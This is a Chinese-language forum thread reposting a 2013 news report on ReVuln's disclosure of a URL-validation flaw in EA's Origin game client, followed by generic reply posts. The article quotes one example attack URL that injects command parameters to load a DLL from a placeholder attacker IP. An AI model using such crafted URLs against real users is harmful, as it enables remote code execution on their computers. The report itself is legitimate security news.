馬上註冊  |  找回密碼

SAY討論區

查看: 255|回復: 18
打印 上一主題 下一主題

EA又中槍:Origin平臺被曝安全漏洞 [複製鏈接]

Rank: 6Rank: 6

好友
0
帖子
4115
積分
9674
最後登錄
2018-7-30
在線時間
0 小時
跳轉到指定樓層
樓主
發表於 2013-3-19 12:21:26 |只看該作者 |正序瀏覽
名為ReVuln的計算機安全公司曾在去年曝光瞭Steam平臺存在URL地址訪問安全漏洞,現在該公司再次在阿姆斯特丹召開的Black Hat安全會議上指出EA的Origin平臺同樣具有類似的問題。

ReVuln公司的研究人員表示,在經過多次測試之後證明,Origin平臺的URL驗證機制存在漏洞,黑客可以利用這一漏洞推送假冒URL鏈接來向玩家計算機中安裝惡意程序。

通常來說,玩家在試圖通過Origin啟動遊戲時,客戶端會先向服務器請求一個用來啟動遊戲的URL地址,比如:origin://LaunchGame/[GameID],而如果該地址被黑客攔截並替換成包含有不良內容的加鏈接,比如:origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll,那麼一旦當玩家執行啟動遊戲操作時便會導致自己的計算機遭遇安全風險。

不過,研究人員也表示,雖然Origin平臺自身具有這樣的安全機制缺陷,但黑客想要通過這種方式對用戶發起攻擊也並非易於反掌,因為目前大多瀏覽器產品都具有非法URL過濾攔截功能,所以為瞭確保計算機的安全,用戶一定要保證打開相關的瀏覽器安全功能,並且安裝有最新版的防病毒軟件,同時拒絕訪問那些不熟悉的URL地址。

vi3ad0dse4s15.jpg

[文章糾錯]

分享分享0 收藏收藏0 讚好讚好0 Unlike!Unlike!0 分享 傳送 邀請

好友
0
帖子
124758
積分
124766
最後登錄
2019-2-28
在線時間
0 小時
19#
發表於 2013-3-25 05:47:37 |只看該作者
很好!很強大!

好友
0
帖子
125462
積分
125468
最後登錄
2019-2-28
在線時間
0 小時
18#
發表於 2013-3-24 06:01:25 |只看該作者
幫你頂,人還是厚道點好

好友
0
帖子
124967
積分
124976
最後登錄
2019-2-28
在線時間
0 小時
17#
發表於 2013-3-23 17:50:49 |只看該作者
給你打氣加油,謝謝分享

好友
0
帖子
131301
積分
137840
最後登錄
2019-2-28
在線時間
0 小時
16#
發表於 2013-3-23 07:00:42 |只看該作者
貌似看過了

好友
0
帖子
124631
積分
124638
最後登錄
2019-2-28
在線時間
0 小時
15#
發表於 2013-3-20 07:38:38 |只看該作者
佩服佩服啊.

好友
0
帖子
127486
積分
130183
最後登錄
2019-2-28
在線時間
0 小時
14#
發表於 2013-3-20 06:46:25 |只看該作者
聲明一下:本人看貼和回貼的規則,好貼必看,精華貼必回。

好友
0
帖子
130012
積分
135426
最後登錄
2019-2-28
在線時間
0 小時
13#
發表於 2013-3-20 05:54:56 |只看該作者
先占個位置,記錄這個好帖子

好友
0
帖子
124785
積分
124807
最後登錄
2019-2-28
在線時間
0 小時
12#
發表於 2013-3-20 05:06:15 |只看該作者
想都不想,就支持一下

好友
0
帖子
125011
積分
125066
最後登錄
2019-2-28
在線時間
0 小時
11#
發表於 2013-3-20 04:06:07 |只看該作者
哎 怎麼說那~~
您需要登錄後才可以回帖 登錄 | 馬上註冊 |

Archiver|手機版|SAY討論區

GMT+8, 2026-6-8 07:26 , Processed in 0.808173 second(s), 11 queries .

Powered by go2tutor.comDiscuz! X2

© 2026 Community Networks Limited

回頂部